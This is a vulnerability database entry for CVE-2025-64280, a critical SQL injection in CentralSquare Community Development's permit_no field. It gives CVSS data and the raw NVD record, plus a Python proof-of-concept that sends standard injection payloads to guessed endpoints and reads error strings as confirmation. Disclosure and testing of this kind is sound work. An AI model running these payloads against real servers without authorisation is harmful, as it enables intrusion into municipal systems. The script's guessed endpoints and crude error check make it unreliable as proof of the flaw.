Security Vulnerability Report
中文
CVE-2025-64280 CVSS 9.8 CRITICAL

CVE-2025-64280

Published: 2025-11-12 16:15:37
Last Modified: 2025-12-31 16:44:01

Description

A SQL Injection Vulnerability in CentralSquare Community Development 19.5.7 allows attackers to inject SQL via the permit_no field.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:centralsquare:community_development:19.5.7:*:*:*:*:*:*:* - VULNERABLE
CentralSquare Community Development 19.5.7
CentralSquare Community Development < 19.5.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64280 SQL Injection PoC # Target: CentralSquare Community Development # Vulnerability: SQL Injection via permit_no field def test_sql_injection(url, payload): """Test SQL injection vulnerability""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } # Common vulnerable endpoint pattern endpoints = [ '/permit/search', '/search/permits', '/api/permits', '/permits', '/public/permit/search' ] for endpoint in endpoints: target_url = url.rstrip('/') + endpoint data = { 'permit_no': payload } try: response = requests.post(target_url, data=data, headers=headers, timeout=10, verify=False) # Check for SQL error indicators if any(err in response.text.lower() for err in ['sql', 'syntax', 'mysql', 'oracle', 'error', 'exception']): print(f'[+] Potential SQL Injection detected at {target_url}') print(f'[+] Payload: {payload}') print(f'[+] Response length: {len(response.text)}') return True except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return False def main(): if len(sys.argv) < 2: print('Usage: python cve-2025-64280.py <target_url>') print('Example: python cve-2025-64280.py https://vulnerable-server.com') sys.exit(1) target = sys.argv[1] # SQL injection test payloads payloads = [ "'", "' OR '1'='1", "' UNION SELECT NULL--", "' AND SLEEP(5)--", "admin'--", "' OR 1=1--" ] print(f'[*] Scanning target: {target}') print(f'[*] Testing CVE-2025-64280 SQL Injection') for payload in payloads: if test_sql_injection(target, payload): print(f'[+] Vulnerability confirmed with payload: {payload}') break else: print('[-] No obvious SQL injection detected') if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64280", "sourceIdentifier": "[email protected]", "published": "2025-11-12T16:15:36.980", "lastModified": "2025-12-31T16:44:00.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection Vulnerability in CentralSquare Community Development 19.5.7 allows attackers to inject SQL via the permit_no field."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centralsquare:community_development:19.5.7:*:*:*:*:*:*:*", "matchCriteriaId": "B643ABCA-E7F8-4635-B215-023FF1FBBCAA"}]}]}], "references": [{"url": "https://centralsquare.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://machevalia.blog/blog/multiple-vulnerabilities-in-centralsquare-etrakit-and-ivr", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}